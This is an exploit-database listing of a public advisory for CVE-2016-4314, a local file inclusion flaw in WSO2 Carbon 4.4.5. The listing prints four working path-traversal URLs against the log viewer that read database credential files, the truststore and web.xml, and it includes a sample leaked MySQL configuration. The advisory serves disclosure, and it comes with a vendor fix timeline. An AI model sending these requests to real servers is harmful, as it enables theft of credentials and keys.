Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtHyp3rlinx1337DAY-ID-25258
HistoryAug 16, 2016 - 12:00 a.m.

WSO2 Carbon 4.4.5 - Local File Inclusion

2016-08-1600:00:00
hyp3rlinx
0day.today
66
JSON

Exploit for jsp platform in category web applications

[+] Credits: John Page aka HYP3RLINX
 
 
Vendor:
===============
www.wso2.com
 
 
Product:
====================
Ws02Carbon v4.4.5
 
WSO2 Carbon is the core platform on which WSO2 middleware products are
built. It is based on Java OSGi technology, which allows
components to be dynamically installed, started, stopped, updated, and
uninstalled, and it eliminates component version conflicts.
In Carbon, this capability translates into a solid core of common
middleware enterprise components, including clustering, security,
logging, and monitoring, plus the ability to add components for specific
features needed to solve a specific enterprise scenario.
 
 
Vulnerability Type:
=========================
Local File Inclusion (LFI)
 
 
CVE Reference:
==============
CVE-2016-4314
 
 
Vulnerability Details:
=====================
 
An authenticated user can download configuration files in the filesystem
via downloadArchivedLogFiles operation in LogViewer admin service.
The request to the admin service accepts a file path relative to the carbon
log file directory (i.e. <WSO2_PRODUCT_HOME>/repository/logs)
hence can access any file in the file system.
 
 
References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0098
 
 
Example: accessing the registry.xml file via Local File Inclusion exposes
the MySQL passwords.
 
<currentDBConfig>mysql-db</currentDBConfig>
<dbConfig name="mysql-db">
<url>jdbc:mysql://localhost:3306/regdb</url>
<userName>regadmin</userName>
<password>regadmin</password>
<driverName>com.mysql.jdbc.Driver</driverName>
<maxActive>80</maxActive>
<maxWait>6000</maxWait>
<minIdle>5</minIdle>
</dbConfig>
 
 
 
Exploit code(s):
===============
 
LFI to read Database creds, truststore key file, web.xml etc...
 
1) Read MySQL creds
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/registry.xml&tenantDomain=&serviceName=
 
2) Read MySQL creds
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/datasources/master-datasources.xml
 
3) Access Truststore Key file.
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/resources/security/client-truststore.jks
 
 
4) Read web.xml
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/tomcat/carbon/WEB-INF/web.xml
 
 
Disclosure Timeline:
===========================================
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016  : Public Disclosure

#  0day.today [2018-01-05]  #

Related

exploitpack 1
cvelist 1
packetstorm 2
prion 1
nvd 1
zdt 1
exploitdb 1
cve 1
exploitpack
exploitpack
WSO2 Carbon 4.4.5 - Local File Inclusion
2016-08-16 00:00:00
cvelist
cvelist
CVE-2016-4314
2017-02-16 18:00:00
packetstorm
packetstorm
DuckieTV CMS 1.1.5 Local File Inclusion
2017-10-13 00:00:00
WSO2 Carbon 4.4.5 Local File Inclusion
2016-08-13 00:00:00
prion
prion
Directory traversal
2017-02-17 02:59:00
nvd
nvd
CVE-2016-4314
2017-02-17 02:59:12
zdt
zdt
DuckieTV CMS 1.1.5 Local File Inclusion Vulnerability
2017-10-14 00:00:00
exploitdb
exploitdb
WSO2 Carbon 4.4.5 - Local File Inclusion
2016-08-16 00:00:00
cve
cve
CVE-2016-4314
2017-02-17 02:59:12
JSON
Related for 1337DAY-ID-25258
exploitpack1cvelist1packetstorm2prion1nvd1zdt1exploitdb1cve1